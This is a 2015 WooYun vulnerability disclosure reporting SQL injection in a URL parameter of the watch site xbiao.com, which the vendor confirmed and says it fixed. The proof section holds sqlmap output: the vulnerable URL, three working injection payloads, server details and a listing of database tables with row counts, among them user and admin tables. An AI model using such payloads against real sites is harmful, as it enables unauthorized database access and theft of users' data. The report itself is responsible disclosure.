当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123562

漏洞标题:腕表之家SQL注入导致63w用户数据测漏

相关厂商:xbiao.com

漏洞作者: 路人甲

提交时间:2015-07-05 16:48

修复时间:2015-08-19 19:16

公开时间:2015-08-19 19:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-05: 细节已通知厂商并且等待厂商处理中
2015-07-05: 厂商已经确认,细节仅向厂商公开
2015-07-15: 细节向核心白帽子及相关领域专家公开
2015-07-25: 细节向普通白帽子公开
2015-08-04: 细节向实习白帽子公开
2015-08-19: 细节向公众公开

简要描述:

腕表之家SQL注入导致63w用户数据测漏#第二发

详细说明:

http://s.xbiao.com/map?id=270

漏洞证明:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=270') AND (SELECT 9984 FROM(SELECT COUNT(*),CONCAT(0x7174687771,(SELECT (CASE WHEN (9984=9984) THEN 1 ELSE 0 END)),0x716e736d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BdZQ'='BdZQ
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: id=270'); SELECT SLEEP(5)--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=270') AND SLEEP(5) AND ('NLgH'='NLgH
---
web application technology: Apache, PHP 5.3.27
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] watch
Database: watch
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| watch_bdsearch_rank | 3065885 |
| watch_consumer_count | 2200741 |
| apache_log | 1392751 |
| watch_count_month | 1018802 |
| watch_link_flag | 987799 |
| watch_product_param_function | 981470 |
| watch_link_catch | 930492 |
| watch_visit_ip_log | 789364 |
| watch_users | 638259 |
| watch_product_param_appearance | 576341 |
| watch_product_param_clock | 498352 |
| watch_count | 477396 |
| watch_search_keywords_log | 442206 |
| watch_apple_user | 293294 |
| watch_iphone_count_month | 252435 |
| watch_app_devices | 226571 |
| watch_user_online | 196244 |
| watch_product_param_normal | 141603 |
| watch_data_catch | 127616 |
| watch_wbiao_compare | 124239 |
| tmp_pic_local | 119017 |
| tmp_pic | 117645 |
| watch_image_info | 104032 |
| wcms_content_log | 100154 |
| watch_ald_content | 89656 |
| watch_product_price | 70768 |
| watch_product | 38421 |
| watch_product_info | 38230 |
| watch_search_keywords | 37678 |
| watch_news_relation | 34444 |
| watch_catch | 33399 |
| tao_products_copy | 30312 |
| cms_base | 30089 |
| cms_content | 30086 |
| watch_brand_rank | 27340 |
| wcms_content_count | 25160 |
| cms_content_bak | 25030 |
| watch_blackwords | 24427 |
| watch_user_cookies | 24102 |
| watch_kms | 23441 |
| watch_brand_catch | 21522 |
| cms_image | 20709 |
| watch_product_comment | 19779 |
| watch_movement_param_val | 19044 |
| watch_link_log | 16906 |
| watch_aladdin | 15698 |
| watch_correction_data | 13031 |
| tao_union_goods | 12862 |
| watch_iwatch365_thread | 11918 |
| watch_favorite_article | 11905 |
| watch_store_brand | 11224 |
| watch_consumer_process | 10980 |
| watch_favorite_brand | 10729 |
| watch_correction | 10280 |
| watch_consumer | 9034 |
| watch_consumer_intention | 9034 |
| watch_sms_captcha | 8965 |
| watch_store | 7140 |
| watch_sms_log | 6244 |
| watch_signature | 5911 |
| watch_link | 5381 |
| watch_job | 5322 |
| wf_img | 4243 |
| watch_vote | 4005 |
| watch_index_pos | 3976 |
| tmp_file | 3822 |
| wf_img_temp | 3678 |
| wcms_content_position | 3546 |
| wf_img_tag | 3521 |
| watch_little_series | 3141 |
| zuoye_relation | 3079 |
| add_log | 2944 |
| wcms_zuoye | 2738 |
| watch_data_dict | 2096 |
| watch_cms_pinjian | 2044 |
| tao_comments | 1942 |
| tao_products | 1838 |
| watch_cat_book_detail | 1825 |
| watch_advise | 1817 |
| watch_cat_new_product | 1369 |
| watch_bbs_recommend | 1367 |
| watch_movement | 1319 |
| watch_series | 1254 |
| watch_authenuser | 964 |
| watch_syslog | 921 |
| watch_index_recommend | 754 |
| watch_bbs_recommend_delete | 600 |
| watch_manual_position | 465 |
| watch_shoot_product | 431 |
| watch_author_id | 425 |
| watch_hot_keywords | 396 |
| watch_catch_log | 376 |
| watch_wbiao_brand | 337 |
| watch_city | 334 |
| watch_brand_store | 304 |
| watch_loves_product | 289 |
| watch_baike | 269 |
| watch_store_picture | 259 |
| wcms_cat_relation | 238 |
| watch_brand_compare | 226 |
| watch_piaget2014 | 224 |
| watch_cat_image_book | 218 |
| tao_union_brand | 217 |
| watch_admin_log | 217 |
| watch_power | 211 |
| zhuanti_common | 199 |
| watch_basel_vote | 182 |
| harmony_shopes | 174 |
| watch_movement_img | 174 |
| watch_loves_product_price | 169 |
| watch_param_value | 157 |
| watch_hot_keywords_log | 113 |
| watch_stop_product | 113 |
| wf_tag | 107 |
| watch_brand | 93 |
| watch_zhuanti_comments | 93 |
| watch_admin_user | 88 |
| watch_store_correction | 86 |
| watch_hk_log | 80 |
| watch_hg_log | 75 |
| watch_param | 73 |
| watch_param_search | 73 |
| watch_brand_forum_relation | 72 |
| watch_zhuanti | 66 |
| watch_hk_consumer_intention | 64 |
| watch_medal_relation | 60 |
| watch_movement_correction | 56 |
| wcms_author | 55 |
| watch_file_cache | 52 |
| watch_movement_manufacturer | 49 |
| watch_iwatch365_forum | 48 |
| watch_events | 42 |
| watch_hg_goods | 41 |
| watch_hk_consumer | 41 |
| watch_temp_shoot | 37 |
| watch_holidays | 35 |
| watch_province | 34 |
| watch_geneva_vote | 27 |
| watch_template | 27 |
| watch_brand_seo_log | 25 |
| watch_hg_info | 22 |
| wcms_copyfrom | 22 |
| watch_hk_discount | 17 |
| watch_kms_param | 14 |
| watch_country | 12 |
| watch_software | 12 |
| tao_favor | 11 |
| tao_users | 10 |
| watch_consumer_note | 10 |
| watch_admin_message | 7 |
| watch_medal_grade | 7 |
| watch_admin_group | 6 |
| watch_param_type | 6 |
| wcms_position | 5 |
| watch_company | 4 |
| wcms_category | 4 |
| watch_mobile_version | 3 |
| wcms_params | 3 |
| tao_union_log | 1 |
| watch_groups | 1 |
| watch_interview | 1 |
| watch_search_keywords_suggestion | 1 |

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-05 19:14

厂商回复:

感谢您提供的漏洞信息,已经修复,多谢。

最新状态:

暂无


漏洞评价:

评论